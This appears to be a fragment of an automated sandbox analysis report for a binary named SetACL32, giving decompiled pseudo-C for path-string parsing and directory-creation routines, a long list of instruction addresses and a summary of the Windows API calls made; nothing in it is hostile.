																__eflags = _t497 - 0xffffffff;
																if(_t497 == 0xffffffff) {
																	L101:
																	asm("movups xmm0, [ebp+0x8]");
																	 *_t633 = 0;
																	 *(_t633 + 0x10) = 0;
																	 *(_t633 + 0x14) = 0;
																	asm("movups [esi], xmm0");
																	asm("movq xmm0, [ebp+0x18]");
																	asm("movq [esi+0x10], xmm0");
																	goto L102;
																} else {
																	__eflags = _t497 - _t314;
																	if(_t497 <= _t314) {
																		goto L101;
																	} else {
																		 *_t633 = 0;
																		__eflags = _t616 - _t497;
																		 *(_t633 + 0x10) = 0;
																		 *(_t633 + 0x14) = 7;
																		_t500 =  <  ? _t616 : _t497;
																		 *_t633 = 0;
																		__eflags = _a8 - 8;
																		_t318 =  >=  ? _v12 :  &_v12;
																		E012A1EE0(_t482, _t633, _t572, _t616, _t633,  >=  ? _v12 :  &_v12,  <  ? _t616 : _t497);
																		_t573 = _a8;
																		__eflags = _t573 - 8;
																		if(_t573 < 8) {
																			L102:
																			 *[fs:0x0] = _v32;
																			return _t633;
																		} else {
																			_t502 = _v12;
																			_t574 = 2 + _t573 * 2;
																			_t320 = _t502;
																			__eflags = _t574 - 0x1000;
																			if(_t574 < 0x1000) {
																				L100:
																				_push(_t574);
																				E012CAE27(_t502);
																				 *[fs:0x0] = _v32;
																				return _t633;
																			} else {
																				_t502 =  *(_t502 - 4);
																				_t574 = _t574 + 0x23;
																				__eflags = _t320 - _t502 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					E012CF35F(_t482, _t502, _t574, __eflags);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					_push(_t646);
																					_t649 = _t661;
																					_push(0xffffffff);
																					_push(0x12ec98d);
																					_push( *[fs:0x0]);
																					_push(_t502);
																					_push(_t482);
																					_push(_t633);
																					_push(_t616);
																					_t327 =  *0x1309018; // 0xedd8d3b4
																					_push(_t327 ^ _t649);
																					_t329 =  &_v257;
																					 *[fs:0x0] = _t329;
																					_t636 = _t502;
																					_v261 = _t636;
																					_v261 = _t636;
																					_v249 = 0;
																					__eflags = _v217 - 8;
																					_t483 = _v221;
																					_t620 =  >=  ? _v237 :  &_v237;
																					__eflags = _t483;
																					if(_t483 == 0) {
																						L110:
																						_t575 = _t574 | 0xffffffff;
																						__eflags = _t575;
																					} else {
																						_t529 = _t502 | 0xffffffff;
																						_t214 = _t483 - 1; // -1
																						_t329 = _t214;
																						__eflags = _t329 - _t529;
																						_t508 =  <  ? _t329 : _t529;
																						__eflags =  *(_t620 + _t508 * 2) - 0x2e;
																						_t574 = _t620 + _t508 * 2;
																						if( *(_t620 + _t508 * 2) == 0x2e) {
																							L109:
																							_t575 = _t574 - _t620 >> 1;
																						} else {
																							while(1) {
																								__eflags = _t574 - _t620;
																								if(_t574 == _t620) {
																									goto L110;
																								}
																								_t574 = _t574 - 2;
																								__eflags =  *_t574 - 0x2e;
																								if( *_t574 != 0x2e) {
																									continue;
																								} else {
																									goto L109;
																								}
																								goto L111;
																							}
																							goto L110;
																						}
																					}
																					L111:
																					__eflags = _a4 - 8;
																					_t622 =  >=  ? _v16 :  &_v16;
																					__eflags = _t483;
																					if(_t483 == 0) {
																						L117:
																						_t330 = _t329 | 0xffffffff;
																						__eflags = _t330;
																					} else {
																						_t222 = _t483 - 1; // -1
																						_t377 = _t222;
																						_t528 = _t502 | 0xffffffff;
																						__eflags = _t377 - _t528;
																						_t508 =  <  ? _t377 : _t528;
																						__eflags =  *(_t622 + _t508 * 2) - 0x5c;
																						_t329 = _t622 + _t508 * 2;
																						if( *(_t622 + _t508 * 2) == 0x5c) {
																							L116:
																							_t330 = _t329 - _t622 >> 1;
																						} else {
																							asm("o16 nop [eax+eax]");
																							while(1) {
																								__eflags = _t329 - _t622;
																								if(_t329 == _t622) {
																									goto L117;
																								}
																								_t329 = _t329 - 2;
																								__eflags =  *_t329 - 0x5c;
																								if( *_t329 != 0x5c) {
																									continue;
																								} else {
																									goto L116;
																								}
																								goto L118;
																							}
																							goto L117;
																						}
																					}
																					L118:
																					__eflags = _t575 - 0xffffffff;
																					if(_t575 == 0xffffffff) {
																						L126:
																						 *_t636 = 0;
																						 *(_t636 + 0x10) = 0;
																						 *(_t636 + 0x14) = 7;
																						 *_t636 = 0;
																						E012A1EE0(_t483, _t636, _t575, _t622, _t636, 0x12f983c, 0);
																						_t576 = _a4;
																						__eflags = _t576 - 8;
																						if(_t576 < 8) {
																							goto L125;
																						} else {
																							_t508 = _v16;
																							_t577 = 2 + _t576 * 2;
																							_t334 = _t508;
																							__eflags = _t577 - 0x1000;
																							if(_t577 < 0x1000) {
																								goto L124;
																							} else {
																								_t508 =  *(_t508 - 4);
																								_t577 = _t577 + 0x23;
																								__eflags = _t334 - _t508 + 0xfffffffc - 0x1f;
																								if(__eflags <= 0) {
																									goto L124;
																								} else {
																									goto L129;
																								}
																							}
																						}
																					} else {
																						__eflags = _t575 - _t330;
																						if(_t575 <= _t330) {
																							goto L126;
																						} else {
																							_t584 = _t575 + 1;
																							 *_t636 = 0;
																							 *(_t636 + 0x10) = 0;
																							 *(_t636 + 0x14) = 7;
																							 *_t636 = 0;
																							__eflags = _t483 - _t584;
																							if(__eflags < 0) {
																								L130:
																								E012986E0(_t508, __eflags);
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								_push(_t649);
																								_t651 = _t661;
																								_push(0xffffffff);
																								_t341 =  *0x1309018; // 0xedd8d3b4
																								 *[fs:0x0] =  &_v290;
																								_t638 = _t508;
																								_v294 = _t638;
																								_v294 = _t638;
																								_t671 = _t661 - 0xfffffffffffffff4;
																								_v282 = 0;
																								_v294 = _t671;
																								_v298 = "\\";
																								_v294 = 0x12fc3e6;
																								E0129A2D0(_t671,  &_v298);
																								_t510 =  &_v270;
																								E012A8E30(_t483, _t510, _t341 ^ _t661, _t622, _t636,  *[fs:0x0], 0x12ec98d);
																								_t624 = _v254;
																								_t672 = _t671 + 0x14;
																								__eflags = _v250 - 8;
																								_t579 =  >=  ? _v270 :  &_v270;
																								__eflags = _t624;
																								if(_t624 == 0) {
																									L142:
																									 *_t638 = 0;
																									 *(_t638 + 0x10) = 0;
																									 *(_t638 + 0x14) = 7;
																									 *_t638 = 0;
																									E012A1EE0(_t483, _t638, _t579, _t624, _t638, 0x12f983c, 0);
																									_t580 = _v0;
																									__eflags = _t580 - 8;
																									if(_t580 < 8) {
																										goto L141;
																									} else {
																										_t514 = _v20;
																										_t581 = 2 + _t580 * 2;
																										_t350 = _t514;
																										__eflags = _t581 - 0x1000;
																										if(_t581 < 0x1000) {
																											goto L140;
																										} else {
																											_t514 =  *((intOrPtr*)(_t514 - 4));
																											_t581 = _t581 + 0x23;
																											__eflags = _t350 - _t514 + 0xfffffffc - 0x1f;
																											if(__eflags <= 0) {
																												goto L140;
																											} else {
																												goto L145;
																											}
																										}
																									}
																								} else {
																									_t518 = _t510 | 0xffffffff;
																									_t361 = _t624 - 1;
																									__eflags = _t361 - _t518;
																									_t519 =  <  ? _t361 : _t518;
																									__eflags =  *((short*)(_t579 + _t519 * 2)) - 0x5c;
																									_t520 = _t579 + _t519 * 2;
																									if( *((short*)(_t579 + _t519 * 2)) == 0x5c) {
																										L136:
																										_t522 = _t520 - _t579 >> 1;
																										__eflags = _t522 - 0xffffffff;
																										if(_t522 == 0xffffffff) {
																											goto L142;
																										} else {
																											 *_t638 = 0;
																											__eflags = _t624 - _t522;
																											 *(_t638 + 0x10) = 0;
																											 *(_t638 + 0x14) = 7;
																											_t523 =  <  ? _t624 : _t522;
																											 *_t638 = 0;
																											__eflags = _v0 - 8;
																											_t364 =  >=  ? _v20 :  &_v20;
																											E012A1EE0(_t483, _t638, _t579, _t624, _t638,  >=  ? _v20 :  &_v20,  <  ? _t624 : _t522);
																											_t583 = _v0;
																											__eflags = _t583 - 8;
																											if(_t583 < 8) {
																												L141:
																												 *[fs:0x0] = _v40;
																												return _t638;
																											} else {
																												_t514 = _v20;
																												_t581 = 2 + _t583 * 2;
																												_t366 = _t514;
																												__eflags = _t581 - 0x1000;
																												if(_t581 < 0x1000) {
																													L140:
																													_push(_t581);
																													E012CAE27(_t514);
																													goto L141;
																												} else {
																													_t514 =  *((intOrPtr*)(_t514 - 4));
																													_t581 = _t581 + 0x23;
																													__eflags = _t366 - _t514 + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														L145:
																														E012CF35F(_t483, _t514, _t581, __eflags);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_v318 = 0;
																														E012983B0(_t672 - 0xfffffffffffffff4, _t514);
																														_t357 = L012C4290( &_v318, 0, _t624, _t638, _t721, 0, _t483, _t651);
																														__eflags = _t357;
																														if(_t357 != 0) {
																															return 0;
																														} else {
																															__eflags = _v36 & 0x00000010;
																															_t360 =  !=  ? 1 : 0;
																															return  !=  ? 1 : 0;
																														}
																													} else {
																														goto L140;
																													}
																												}
																											}
																										}
																									} else {
																										while(1) {
																											__eflags = _t520 - _t579;
																											if(_t520 == _t579) {
																												goto L142;
																											}
																											_t520 = _t520 - 2;
																											__eflags =  *_t520 - 0x5c;
																											if( *_t520 != 0x5c) {
																												continue;
																											} else {
																												goto L136;
																											}
																											goto L149;
																										}
																										goto L142;
																									}
																								}
																							} else {
																								_t483 = _t483 - _t584;
																								__eflags = _t483 - 0xffffffff;
																								_t526 =  <  ? _t483 : 0xffffffff;
																								__eflags = _a4 - 8;
																								_t371 =  >=  ? _v16 :  &_v16;
																								E012A1EE0(_t483, _t636, _t584, _t622, _t636, ( >=  ? _v16 :  &_v16) + _t584 * 2,  <  ? _t483 : 0xffffffff);
																								_t585 = _a4;
																								__eflags = _t585 - 8;
																								if(_t585 < 8) {
																									L125:
																									 *[fs:0x0] = _v36;
																									return _t636;
																								} else {
																									_t508 = _v16;
																									_t577 = 2 + _t585 * 2;
																									_t374 = _t508;
																									__eflags = _t577 - 0x1000;
																									if(_t577 < 0x1000) {
																										L124:
																										_push(_t577);
																										E012CAE27(_t508);
																										goto L125;
																									} else {
																										_t508 =  *(_t508 - 4);
																										_t577 = _t577 + 0x23;
																										__eflags = _t374 - _t508 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											L129:
																											E012CF35F(_t483, _t508, _t577, __eflags);
																											goto L130;
																										} else {
																											goto L124;
																										}
																									}
																								}
																							}
																						}
																					}
																				} else {
																					goto L100;
																				}
																			}
																		}
																	}
																}
															} else {
																goto L78;
															}
														}
													}
												}
											} else {
												goto L8;
											}
										}
									}
								}
							}
						}
					}
				}
				L149:
			}






















































































































































































              0x012c5150
              0x012c5150
              0x012c5150
              0x012c5151
              0x012c5159
              0x012c5160
              0x012c5164
              0x012c5166
              0x012c5168
              0x012c5173
              0x012c5174
              0x012c5175
              0x012c517b
              0x012c5182
              0x012c518b
              0x012c5191
              0x012c5197
              0x012c51a0
              0x012c51a7
              0x012c51a9
              0x012c51b6
              0x012c51c3
              0x012c5581
              0x012c5581
              0x012c5588
              0x00000000
              0x012c558e
              0x012c558e
              0x012c5598
              0x012c559b
              0x00000000
              0x012c55a1
              0x012c55a1
              0x012c55a9
              0x012c55bf
              0x012c55c4
              0x012c55ce
              0x012c55d2
              0x012c55d9
              0x012c55dc
              0x012c55e0
              0x012c55e5
              0x012c55ea
              0x012c55f1
              0x012c55f8
              0x012c55fb
              0x012c5601
              0x012c5606
              0x012c5611
              0x012c5618
              0x012c561c
              0x012c5621
              0x012c5629
              0x012c562d
              0x012c5631
              0x012c5634
              0x012c5639
              0x012c563c
              0x012c563f
              0x012c5673
              0x012c5673
              0x012c5676
              0x012c5679
              0x012c56ad
              0x012c56ad
              0x012c56b0
              0x012c56b3
              0x00000000
              0x012c56b5
              0x012c56b5
              0x012c56b8
              0x012c56bf
              0x012c56c1
              0x012c56c7
              0x012c56dd
              0x012c56dd
              0x012c56df
              0x00000000
              0x012c56c9
              0x012c56c9
              0x012c56cc
              0x012c56d4
              0x012c56d7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c56d7
              0x012c56c7
              0x012c567b
              0x012c567b
              0x012c567e
              0x012c5685
              0x012c5687
              0x012c568d
              0x012c56a3
              0x012c56a3
              0x012c56a5
              0x012c56aa
              0x00000000
              0x012c568f
              0x012c568f
              0x012c5692
              0x012c569a
              0x012c569d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c569d
              0x012c568d
              0x012c5641
              0x012c5641
              0x012c5644
              0x012c564b
              0x012c564d
              0x012c5653
              0x012c5669
              0x012c5669
              0x012c566b
              0x012c5670
              0x00000000
              0x012c5655
              0x012c5655
              0x012c5658
              0x012c5660
              0x012c5663
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5663
              0x012c5653
              0x012c563f
              0x012c559b
              0x012c51c9
              0x012c51c9
              0x012c51cf
              0x012c51d1
              0x012c51d5
              0x00000000
              0x012c51db
              0x012c51e1
              0x012c5411
              0x012c5418
              0x00000000
              0x012c541e
              0x012c541e
              0x012c5428
              0x012c542b
              0x00000000
              0x012c5431
              0x012c5431
              0x012c5439
              0x012c544f
              0x012c5454
              0x012c545e
              0x012c5462
              0x012c5469
              0x012c546c
              0x012c5470
              0x012c5475
              0x012c547a
              0x012c5481
              0x012c5488
              0x012c548b
              0x012c5491
              0x012c5496
              0x012c54a1
              0x012c54a8
              0x012c54ac
              0x012c54b1
              0x012c54b9
              0x012c54bd
              0x012c54c1
              0x012c54c4
              0x012c54c9
              0x012c54cc
              0x012c54cf
              0x012c5503
              0x012c5503
              0x012c5506
              0x012c5509
              0x012c553d
              0x012c553d
              0x012c5540
              0x012c5542
              0x012c5545
              0x00000000
              0x012c554b
              0x012c554b
              0x012c554e
              0x012c5555
              0x012c5557
              0x012c555d
              0x012c5573
              0x012c5573
              0x012c5575
              0x012c557a
              0x012c56e4
              0x012c56e4
              0x00000000
              0x012c555f
              0x012c555f
              0x012c5562
              0x012c556a
              0x012c556d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c556d
              0x012c555d
              0x012c550b
              0x012c550b
              0x012c550e
              0x012c5515
              0x012c5517
              0x012c551d
              0x012c5533
              0x012c5533
              0x012c5535
              0x012c553a
              0x00000000
              0x012c551f
              0x012c551f
              0x012c5522
              0x012c552a
              0x012c552d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c552d
              0x012c551d
              0x012c54d1
              0x012c54d1
              0x012c54d4
              0x012c54db
              0x012c54dd
              0x012c54e3
              0x012c54f9
              0x012c54f9
              0x012c54fb
              0x012c5500
              0x00000000
              0x012c54e5
              0x012c54e5
              0x012c54e8
              0x012c54f0
              0x012c54f3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c54f3
              0x012c54e3
              0x012c54cf
              0x012c542b
              0x012c51e7
              0x012c51ee
              0x012c540a
              0x012c540a
              0x012c56e7
              0x012c56e7
              0x012c56f2
              0x012c56f8
              0x012c5728
              0x012c572d
              0x012c5735
              0x012c5736
              0x012c5747
              0x012c56fa
              0x012c56fa
              0x012c56fd
              0x012c5704
              0x012c570c
              0x012c571e
              0x012c571e
              0x012c5720
              0x00000000
              0x012c570e
              0x012c570e
              0x012c5711
              0x012c571c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c571c
              0x012c570c
              0x012c51f4
              0x012c5201
              0x012c5203
              0x012c520c
              0x012c520f
              0x012c5214
              0x012c5748
              0x00000000
              0x012c521a
              0x012c5222
              0x012c5238
              0x012c523d
              0x012c5247
              0x012c524b
              0x012c5252
              0x012c5255
              0x012c5259
              0x012c525e
              0x012c5263
              0x012c526a
              0x012c5271
              0x012c5274
              0x012c5278
              0x012c5286
              0x012c528b
              0x012c5296
              0x012c52a2
              0x012c52a9
              0x012c52b0
              0x012c52b4
              0x012c52b9
              0x012c52c1
              0x012c52c5
              0x012c52c9
              0x012c52cc
              0x012c52d1
              0x012c52d7
              0x012c530b
              0x012c530b
              0x012c5311
              0x012c5345
              0x012c5345
              0x012c534b
              0x012c537f
              0x012c537f
              0x012c5385
              0x012c53b9
              0x012c53b9
              0x012c53be
              0x012c53c5
              0x012c53cc
              0x012c53d3
              0x00000000
              0x012c53d5
              0x012c53d5
              0x012c53db
              0x012c53e2
              0x012c53ea
              0x012c5400
              0x012c5400
              0x012c5402
              0x012c5407
              0x00000000
              0x012c53ec
              0x012c53ec
              0x012c53ef
              0x012c53fa
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c53fa
              0x012c53ea
              0x012c5387
              0x012c5387
              0x012c538a
              0x012c5391
              0x012c5399
              0x012c53af
              0x012c53af
              0x012c53b1
              0x012c53b6
              0x00000000
              0x012c539b
              0x012c539b
              0x012c539e
              0x012c53a9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c53a9
              0x012c5399
              0x012c534d
              0x012c534d
              0x012c5350
              0x012c5357
              0x012c535f
              0x012c5375
              0x012c5375
              0x012c5377
              0x012c537c
              0x00000000
              0x012c5361
              0x012c5361
              0x012c5364
              0x012c536f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c536f
              0x012c535f
              0x012c5313
              0x012c5313
              0x012c5316
              0x012c531d
              0x012c5325
              0x012c533b
              0x012c533b
              0x012c533d
              0x012c5342
              0x00000000
              0x012c5327
              0x012c5327
              0x012c532a
              0x012c5335
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5335
              0x012c5325
              0x012c52d9
              0x012c52d9
              0x012c52dc
              0x012c52e3
              0x012c52eb
              0x012c5301
              0x012c5301
              0x012c5303
              0x012c5308
              0x00000000
              0x012c52ed
              0x012c52ed
              0x012c52f0
              0x012c52fb
              0x012c574d
              0x012c574d
              0x012c5752
              0x012c5752
              0x012c5757
              0x012c5757
              0x012c575c
              0x012c575c
              0x012c5761
              0x012c5761
              0x012c5766
              0x012c5766
              0x012c576b
              0x012c576c
              0x012c576d
              0x012c576e
              0x012c576f
              0x012c5770
              0x012c5771
              0x012c5773
              0x012c5775
              0x012c5780
              0x012c5781
              0x012c5782
              0x012c5783
              0x012c5784
              0x012c5785
              0x012c578c
              0x012c578d
              0x012c5790
              0x012c5796
              0x012c5798
              0x012c579b
              0x012c579e
              0x012c57ac
              0x012c57af
              0x012c57b3
              0x012c57b8
              0x012c57e3
              0x012c57e3
              0x012c57e3
              0x012c57ba
              0x012c57ba
              0x012c57c1
              0x012c57c9
              0x012c57cc
              0x012c57dd
              0x012c57df
              0x012c57d0
              0x012c57d0
              0x012c57d4
              0x012c57db
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c57db
              0x00000000
              0x012c57d0
              0x012c57cc
              0x012c57e6
              0x012c57e6
              0x012c57e6
              0x012c57e9
              0x012c57f1
              0x012c57f8
              0x012c57ff
              0x012c5804
              0x012c586f
              0x00000000
              0x012c5806
              0x012c5806
              0x012c580e
              0x012c5816
              0x012c5820
              0x012c5825
              0x012c582b
              0x012c585b
              0x012c5860
              0x012c586e
              0x012c582d
              0x012c582d
              0x012c5830
              0x012c5837
              0x012c583f
              0x012c5851
              0x012c5851
              0x012c5853
              0x00000000
              0x012c5841
              0x012c5841
              0x012c5844
              0x012c584f
              0x012c5874
              0x012c5874
              0x012c5879
              0x012c587a
              0x012c587b
              0x012c587c
              0x012c587d
              0x012c587e
              0x012c587f
              0x012c5880
              0x012c5881
              0x012c5883
              0x012c5885
              0x012c5890
              0x012c5891
              0x012c5892
              0x012c5893
              0x012c5894
              0x012c589b
              0x012c589c
              0x012c589f
              0x012c58a5
              0x012c58a7
              0x012c58aa
              0x012c58ad
              0x012c58b7
              0x012c58bb
              0x012c58be
              0x012c58c2
              0x012c58c4
              0x012c58f3
              0x012c58f3
              0x012c58f3
              0x012c58c6
              0x012c58c6
              0x012c58c9
              0x012c58c9
              0x012c58cc
              0x012c58ce
              0x012c58d1
              0x012c58d6
              0x012c58d9
              0x012c58ed
              0x012c58ef
              0x012c58e0
              0x012c58e0
              0x012c58e0
              0x012c58e2
              0x00000000
              0x00000000
              0x012c58e4
              0x012c58e7
              0x012c58eb
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c58eb
              0x00000000
              0x012c58e0
              0x012c58d9
              0x012c58f6
              0x012c58f6
              0x012c58fd
              0x012c5901
              0x012c5903
              0x012c5935
              0x012c5935
              0x012c5935
              0x012c5905
              0x012c5905
              0x012c5905
              0x012c590d
              0x012c5910
              0x012c5913
              0x012c5915
              0x012c5918
              0x012c591d
              0x012c5920
              0x012c592f
              0x012c5931
              0x012c5922
              0x012c5922
              0x012c5922
              0x012c5924
              0x00000000
              0x00000000
              0x012c5926
              0x012c5929
              0x012c592d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c592d
              0x00000000
              0x012c5922
              0x012c5920
              0x012c5938
              0x012c5938
              0x012c593b
              0x012c59bc
              0x012c59bc
              0x012c59c0
              0x012c59c6
              0x012c59cd
              0x012c59d4
              0x012c59d7
              0x012c59dc
              0x00000000
              0x012c593d
              0x012c593d
              0x012c593f
              0x00000000
              0x012c5941
              0x012c5943
              0x012c5949
              0x012c594b
              0x012c5952
              0x012c5959
              0x012c595c
              0x012c595f
              0x012c5967
              0x012c596e
              0x012c5973
              0x012c5976
              0x012c5979
              0x012c59e1
              0x012c59e6
              0x012c59f3
              0x012c597b
              0x012c597b
              0x012c597e
              0x012c5985
              0x012c5987
              0x012c598d
              0x012c599f
              0x012c599f
              0x012c59a1
              0x012c59ae
              0x012c59bb
              0x012c598f
              0x012c598f
              0x012c5992
              0x012c599a
              0x012c599d
              0x012c59f4
              0x012c59f9
              0x012c59fa
              0x012c59fb
              0x012c59fc
              0x012c59fd
              0x012c59fe
              0x012c59ff
              0x012c5a00
              0x012c5a01
              0x012c5a03
              0x012c5a05
              0x012c5a10
              0x012c5a11
              0x012c5a12
              0x012c5a13
              0x012c5a14
              0x012c5a15
              0x012c5a1c
              0x012c5a1d
              0x012c5a20
              0x012c5a26
              0x012c5a28
              0x012c5a2b
              0x012c5a2e
              0x012c5a38
              0x012c5a3c
              0x012c5a3f
              0x012c5a43
              0x012c5a45
              0x012c5a73
              0x012c5a73
              0x012c5a73
              0x012c5a47
              0x012c5a47
              0x012c5a4a
              0x012c5a4a
              0x012c5a4d
              0x012c5a4f
              0x012c5a52
              0x012c5a57
              0x012c5a5a
              0x012c5a6d
              0x012c5a6f
              0x012c5a60
              0x012c5a60
              0x012c5a60
              0x012c5a62
              0x00000000
              0x00000000
              0x012c5a64
              0x012c5a67
              0x012c5a6b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5a6b
              0x00000000
              0x012c5a60
              0x012c5a5a
              0x012c5a76
              0x012c5a76
              0x012c5a7d
              0x012c5a81
              0x012c5a83
              0x012c5ab3
              0x012c5ab3
              0x012c5ab3
              0x012c5a85
              0x012c5a85
              0x012c5a85
              0x012c5a88
              0x012c5a8b
              0x012c5a8d
              0x012c5a90
              0x012c5a95
              0x012c5a98
              0x012c5aad
              0x012c5aaf
              0x012c5a9a
              0x012c5a9a
              0x012c5aa0
              0x012c5aa0
              0x012c5aa2
              0x00000000
              0x00000000
              0x012c5aa4
              0x012c5aa7
              0x012c5aab
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5aab
              0x00000000
              0x012c5aa0
              0x012c5a98
              0x012c5ab6
              0x012c5ab6
              0x012c5ab9
              0x012c5b57
              0x012c5b59
              0x012c5b60
              0x012c5b69
              0x012c5b75
              0x012c5b78
              0x012c5b7d
              0x012c5b80
              0x012c5b83
              0x00000000
              0x012c5b85
              0x012c5b85
              0x012c5b88
              0x012c5b8f
              0x012c5b91
              0x012c5b97
              0x00000000
              0x012c5b99
              0x012c5b99
              0x012c5b9c
              0x012c5ba4
              0x012c5ba7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5ba7
              0x012c5b97
              0x012c5abf
              0x012c5abf
              0x012c5ac1
              0x00000000
              0x012c5ac7
              0x012c5ac7
              0x012c5ac8
              0x012c5ad0
              0x012c5ad7
              0x012c5ade
              0x012c5ae1
              0x012c5ae3
              0x012c5bae
              0x012c5bae
              0x012c5bb3
              0x012c5bb4
              0x012c5bb5
              0x012c5bb6
              0x012c5bb7
              0x012c5bb8
              0x012c5bb9
              0x012c5bba
              0x012c5bbb
              0x012c5bbc
              0x012c5bbd
              0x012c5bbe
              0x012c5bbf
              0x012c5bc0
              0x012c5bc1
              0x012c5bc3
              0x012c5bd6
              0x012c5be1
              0x012c5be7
              0x012c5be9
              0x012c5bec
              0x012c5bef
              0x012c5bf2
              0x012c5bfe
              0x012c5c01
              0x012c5c09
              0x012c5c10
              0x012c5c15
              0x012c5c18
              0x012c5c1d
              0x012c5c23
              0x012c5c26
              0x012c5c2a
              0x012c5c2e
              0x012c5c30
              0x012c5ce5
              0x012c5ce7
              0x012c5cee
              0x012c5cf7
              0x012c5d03
              0x012c5d06
              0x012c5d0b
              0x012c5d0e
              0x012c5d11
              0x00000000
              0x012c5d13
              0x012c5d13
              0x012c5d16
              0x012c5d1d
              0x012c5d1f
              0x012c5d25
              0x00000000
              0x012c5d27
              0x012c5d27
              0x012c5d2a
              0x012c5d32
              0x012c5d35
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5d35
              0x012c5d25
              0x012c5c36
              0x012c5c36
              0x012c5c39
              0x012c5c3c
              0x012c5c3e
              0x012c5c41
              0x012c5c46
              0x012c5c49
              0x012c5c61
              0x012c5c63
              0x012c5c65
              0x012c5c68
              0x00000000
              0x012c5c6a
              0x012c5c6c
              0x012c5c72
              0x012c5c74
              0x012c5c7b
              0x012c5c82
              0x012c5c85
              0x012c5c88
              0x012c5c90
              0x012c5c97
              0x012c5c9c
              0x012c5c9f
              0x012c5ca2
              0x012c5cd2
              0x012c5cd7
              0x012c5ce4
              0x012c5ca4
              0x012c5ca4
              0x012c5ca7
              0x012c5cae
              0x012c5cb0
              0x012c5cb6
              0x012c5cc8
              0x012c5cc8
              0x012c5cca
              0x00000000
              0x012c5cb8
              0x012c5cb8
              0x012c5cbb
              0x012c5cc3
              0x012c5cc6
              0x012c5d37
              0x012c5d37
              0x012c5d3c
              0x012c5d3d
              0x012c5d3e
              0x012c5d3f
              0x012c5d4a
              0x012c5d58
              0x012c5d64
              0x012c5d6c
              0x012c5d6e
              0x012c5d8a
              0x012c5d70
              0x012c5d70
              0x012c5d7c
              0x012c5d83
              0x012c5d83
              0x00000000
              0x00000000
              0x00000000
              0x012c5cc6
              0x012c5cb6
              0x012c5ca2
              0x012c5c50
              0x012c5c50
              0x012c5c50
              0x012c5c52
              0x00000000
              0x00000000
              0x012c5c58
              0x012c5c5b
              0x012c5c5f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5c5f
              0x00000000
              0x012c5c50
              0x012c5c49
              0x012c5ae9
              0x012c5ae9
              0x012c5aee
              0x012c5af6
              0x012c5af9
              0x012c5afe
              0x012c5b08
              0x012c5b0d
              0x012c5b10
              0x012c5b13
              0x012c5b43
              0x012c5b48
              0x012c5b56
              0x012c5b15
              0x012c5b15
              0x012c5b18
              0x012c5b1f
              0x012c5b21
              0x012c5b27
              0x012c5b39
              0x012c5b39
              0x012c5b3b
              0x00000000
              0x012c5b29
              0x012c5b29
              0x012c5b2c
              0x012c5b34
              0x012c5b37
              0x012c5ba9
              0x012c5ba9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c5b37
              0x012c5b27
              0x012c5b13
              0x012c5ae3
              0x012c5ac1
              0x00000000
              0x00000000
              0x00000000
              0x012c599d
              0x012c598d
              0x012c5979
              0x012c593f
              0x00000000
              0x00000000
              0x00000000
              0x012c584f
              0x012c583f
              0x012c582b
              0x00000000
              0x00000000
              0x00000000
              0x012c52fb
              0x012c52eb
              0x012c52d7
              0x012c5214
              0x012c51ee
              0x012c51e1
              0x012c51d5
              0x00000000

              APIs
              • CreateDirectoryW.KERNEL32(?,00000000,EDD8D3B4,?,?), ref: 012C51BB
              • GetLastError.KERNEL32 ref: 012C51C9
                • Part of subcall function 012A88E0: GetLastError.KERNEL32(EDD8D3B4,00000000,00000000), ref: 012A8960
                • Part of subcall function 012A98F0: EnterCriticalSection.KERNEL32(0130B6D4,EDD8D3B4,?), ref: 012A9982
                • Part of subcall function 012A98F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 012A99CB
                • Part of subcall function 012A98F0: GetCurrentThreadId.KERNEL32 ref: 012A99EE
                • Part of subcall function 012A98F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 012A9A2A
                • Part of subcall function 012A98F0: GetLastError.KERNEL32 ref: 012A9A34
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$Time$CreateCriticalCurrentDirectoryEnterFileNameSectionSystemThreadUser
